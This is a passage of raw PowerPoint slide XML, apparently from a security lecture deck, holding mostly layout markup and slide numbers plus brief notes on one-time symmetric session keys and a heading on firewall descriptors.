        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="B2B2B2"/>
              </a:buClr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{5D0726A5-6FF9-4B13-81C6-A261F25C8933}" type="slidenum">
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr>
                <a:buClr>
                  <a:srgbClr val="B2B2B2"/>
                </a:buClr>
                <a:defRPr/>
              </a:pPr>
              <a:t>101</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="695610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B2B2B2"/>
              </a:buClr>
            </a:pPr>
            <a:fld id="{693CF61C-CAA3-4A7D-BFA5-6A2C693B562C}" type="slidenum">
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr>
                <a:buClr>
                  <a:srgbClr val="B2B2B2"/>
                </a:buClr>
              </a:pPr>
              <a:t>102</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3591234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en-US" dirty="0" smtClean="0"/>
              <a:t>Session keys </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>- Symmetric key</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>- Used only once </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Provides more protection </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>If the key is used multiple times it can be intercepted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> or subject to cryptanalysis</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="B2B2B2"/>
              </a:buClr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{5D0726A5-6FF9-4B13-81C6-A261F25C8933}" type="slidenum">
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr>
                <a:buClr>
                  <a:srgbClr val="B2B2B2"/>
                </a:buClr>
                <a:defRPr/>
              </a:pPr>
              <a:t>103</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2613684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39" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3884760" y="8685360"/>
            <a:ext cx="2971440" cy="456840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9360">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:fld id="{55C6BF90-FA50-4282-9E84-75A96F3637C6}" type="slidenum">
              <a:rPr lang="en-US" sz="1200" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:pPr algn="r">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
              </a:p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0692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819432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43000" y="685800"/>
            <a:ext cx="4572000" cy="3429000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>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19823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B2B2B2"/>
              </a:buClr>
            </a:pPr>
            <a:fld id="{693CF61C-CAA3-4A7D-BFA5-6A2C693B562C}" type="slidenum">
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr>
                <a:buClr>
                  <a:srgbClr val="B2B2B2"/>
                </a:buClr>
              </a:pPr>
              <a:t>107</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1031700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B2B2B2"/>
              </a:buClr>
            </a:pPr>
            <a:fld id="{693CF61C-CAA3-4A7D-BFA5-6A2C693B562C}" type="slidenum">
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr>
                <a:buClr>
                  <a:srgbClr val="B2B2B2"/>
                </a:buClr>
              </a:pPr>
              <a:t>108</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1467023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43000" y="685800"/>
            <a:ext cx="4572000" cy="3429000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>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88153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696506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B2B2B2"/>
              </a:buClr>
            </a:pPr>
            <a:fld id="{0AF5988A-C2F9-40C5-AACB-30EDD717F8A5}" type="slidenum">
              <a:rPr lang="en-AU">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr>
                <a:buClr>
                  <a:srgbClr val="B2B2B2"/>
                </a:buClr>
              </a:pPr>
              <a:t>114</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1513355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B2B2B2"/>
              </a:buClr>
            </a:pPr>
            <a:fld id="{6453976E-CD5F-447A-899C-29926B57EE19}" type="slidenum">
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr>
                <a:buClr>
                  <a:srgbClr val="B2B2B2"/>
                </a:buClr>
              </a:pPr>
              <a:t>115</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1858626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buClr>
                <a:srgbClr val="B2B2B2"/>
              </a:buClr>
            </a:pPr>
            <a:fld id="{868D411A-4794-419C-AB6C-B7C249B11DC9}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-AU">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr>
                <a:buClr>
                  <a:srgbClr val="B2B2B2"/>
                </a:buClr>
              </a:pPr>
              <a:t>116</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" altLang="zh-TW">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1024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024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36396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120</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="325059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41" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3884760" y="8685360"/>
            <a:ext cx="2971440" cy="456840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9360">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:fld id="{B9E78714-8B3E-4041-BD2C-9D4077FBFC8C}" type="slidenum">
              <a:rPr lang="en-US" sz="1200" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:pPr algn="r">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
              </a:p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01389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121</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1969841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129</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3866258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130</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="80424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134</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35165027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135</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1207182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0726A5-6FF9-4B13-81C6-A261F25C8933}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>137</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="207479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43" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3884760" y="8685360"/>
            <a:ext cx="2971440" cy="456840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9360">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:fld id="{4AE0FDD1-51BF-4062-9D28-BFCBC2F916D5}" type="slidenum">
              <a:rPr lang="en-US" sz="1200" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:pPr algn="r">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:t>33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5908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extShape 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3884760" y="8685360"/>
            <a:ext cx="2971440" cy="456840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9360">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:fld id="{7C457CB0-0585-4EC5-952A-7A2DEA15BE78}" type="slidenum">
              <a:rPr lang="en-US" sz="1200" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:pPr algn="r">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:t>37</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1400" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:uFill>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:uFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="645"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solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Common descriptors that can be implemented by a firewall</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="261662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extShape 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3884760" y="8685360"/>
            <a:ext cx="2971440" cy="456840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9360">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:fld id="{ABA8F1E5-28B6-4FF3-98CA-1D31EAF1DC7A}" type="slidenum">
              <a:rPr lang="en-US" sz="1200" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:pPr algn="r">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:t>46</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1400" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:uFill>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:uFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="647" name="PlaceHolder 2"/>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5158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1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3884760" y="8685360"/>
            <a:ext cx="2971440" cy="456840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9360">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:fld id="{D7043595-C00B-40AE-8085-DD047413F4FB}" type="slidenum">
              <a:rPr lang="en-US" sz="1200" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:pPr algn="r">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:t>47</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1400" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:uFill>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:uFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="649" name="PlaceHolder 2"/>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4205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PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="4343400"/>
            <a:ext cx="5486040" cy="411444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651" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3884760" y="8685360"/>
            <a:ext cx="2971440" cy="456840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9360">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:fld id="{48CB2184-8C83-42D6-989D-0468BDAF47D7}" type="slidenum">
              <a:rPr lang="en-US" sz="1200" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:pPr algn="r">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:t>48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192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85800" y="175248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30" name="PlaceHolder 3"/>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33"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34"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35" name="PlaceHolder 5"/>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38" name="PlaceHolder 3"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="39" name="Picture 38"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1850040" y="1752480"/>
            <a:ext cx="5443200" cy="4343040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="40" name="Picture 39"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1850040" y="1752480"/>
            <a:ext cx="5443200" cy="4343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48" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1752480"/>
            <a:ext cx="7772040" cy="4343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53" name="PlaceHolder 3"/>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85800" y="457200"/>
            <a:ext cx="7772040" cy="459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58" name="PlaceHolder 3"/>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59" name="PlaceHolder 4"/>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8" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1752480"/>
            <a:ext cx="7772040" cy="4343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62"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63"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66"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67" name="PlaceHolder 4"/>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685800" y="175248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70" name="PlaceHolder 3"/>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73"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74"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75" name="PlaceHolder 5"/>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78" name="PlaceHolder 3"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="79" name="Picture 78"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1850040" y="1752480"/>
            <a:ext cx="5443200" cy="4343040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="80" name="Picture 79"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1850040" y="1752480"/>
            <a:ext cx="5443200" cy="43430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89" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1752480"/>
            <a:ext cx="7772040" cy="4343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94" name="PlaceHolder 3"/>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85800" y="457200"/>
            <a:ext cx="7772040" cy="459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99" name="PlaceHolder 3"/>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00" name="PlaceHolder 4"/>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03"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04"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07"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08" name="PlaceHolder 4"/>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685800" y="175248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11" name="PlaceHolder 3"/>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14"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15"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16" name="PlaceHolder 5"/>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18" name="PlaceHolder 2"/>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19" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1752480"/>
            <a:ext cx="777204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pic>
        <p:nvPicPr>
          <p:cNvPr id="120" name="Picture 119"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1850040" y="1752480"/>
            <a:ext cx="5443200" cy="4343040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="121" name="Picture 120"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1850040" y="1752480"/>
            <a:ext cx="5443200" cy="43430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flipV="1">
            <a:off x="762000" y="3124200"/>
            <a:ext cx="7772400" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="808080"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3000" b="1">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45058" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1196975"/>
            <a:ext cx="7772400" cy="1470025"/>
          </a:xfrm>
          <a:ln w="12700"/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45059" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="3581400"/>
            <a:ext cx="6400800" cy="1752600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
